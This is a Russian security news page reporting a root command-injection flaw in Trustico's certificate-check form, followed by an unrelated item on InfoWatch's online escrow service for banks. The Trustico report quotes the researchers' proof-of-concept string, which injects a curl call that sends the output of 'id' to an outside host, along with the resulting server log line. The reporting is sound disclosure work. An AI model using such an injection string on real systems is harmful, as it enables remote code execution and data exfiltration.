Все сертификаты Trustico отзовут из-за полной компрометации сервера

Все сертификаты Trustico отзовут из-за полной компрометации сервера

Ранее освещенная история с проблемными сертификатами, полученными через реселлера Trustico, усугубилась новыми подробностями. В веб-интерфейсе сервиса была обнаружена уязвимость, позволяющая получить к серверу root-доступ.

Если раньше эксперты только гадали, что может быть причиной того, что Trustico решила отозвать выданные сертификаты, то сейчас ситуация начинает проясняться. Похоже, что такое решение связано с киберинцидентом, подорвавшим безопасность реселлера.

Сама брешь имеет довольно посредственный характер — допускается ввод без экранирования спецсимволов. Таким образом, если кто-либо введет в форме проверки сертификата шелл-операторы, они будут исполнены на серверы с правами root.

Об этой проблеме сообщили эксперты Manawyrm и Predrag Cujanović в Twitter.

В качестве примера специалисты приводят ввод следующую строку:

$(curl https://3.5.6.9/`id`)

Которая отправит на хост запрос:

3.5.6.9 - [01/Mar/2018:09:52:14 -0500] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

Сообщается, что на данный момент сайт Trustico недоступен. Специалистам пока не удалось выяснить, позволяет ли данная брешь скомпрометировать приватные ключи сертификатов, однако одному из исследователей удалось найти в конфигурации секретный ключ для SSL-сертификта домена «*.trustico.com».

Следовательно, в ближайшее время DigiCert и Comodo отреагируют на инцидент, что, скорее всего, приведет к отзыву всех выданных через Trustico сертификатов.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

InfoWatch разработала сервис безопасных онлайн-расчетов для банков

ГК InfoWatch разработала сервис «Онлайн-аккредитив» для проведения безопасных расчетов между поставщиками и покупателями товаров и услуг в Сети. Сервис для банков и В2В-сектора создан для защиты интересов всех сторон, принимающих участие в процессе купли-продажи в условиях недостаточной информированности друг о друге.

«Онлайн-аккредитив» обеспечивает гарантированный возврат средств покупателю, если продавец не оказывает услугу или не поставляет заказанный товар, а также, если товар или услуга поставляются с нарушениями условий договора - оказываются некачественными или поставленными не в том объеме. В свою очередь, поставщик товаров или услуг становится защищенным от претензий недобросовестных покупателей при помощи прозрачной процедуры арбитража, которую при возникновении спорных случаев ведут специалисты компании-оператора сервиса (любого российского банка, использующего «Онлайн-аккредитив»).

«Как правило, продавец и покупатель товаров и услуг при первом контакте никак не защищены от обмана, они не знают друг друга, у них нет гарантий того, что крупная сделка пройдет честно и гладко. Наш сервис – это аналог банковской ячейки для незнакомых друг с другом сторон. Благодаря его работе обе стороны могут быть полностью уверены в конечном результате – покупатель в получении товара, а продавец – в поступлении оплаты за заказ – полностью и в срок», — объясняет Наталья Касперская, президент ГК InfoWatch.

Сервис работает так: покупатель перечисляет средства для оплаты товара или услуги на номинальный счет, созданный компанией-оператором сервиса, где перечисленные средства резервируются. Затем продавец отгружает товар или оказывает услугу. После того, как покупатель подтвердил получение товара или услуги, продавец может получить свои деньги.

Новая разработка ГК InfoWatch позволяет российским банкам расширить продуктовую линейку сервисом для осуществления безопасных сделок в режиме онлайн, резко ускорить проведение сделок, сократить затраты на проведение документарных операций и исключить ошибки, вызванные человеческим фактором. В свою очередь, платформы для электронной коммерции получают эффективный и защищенный способ организации онлайн-расчетов при выполнении заказов.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru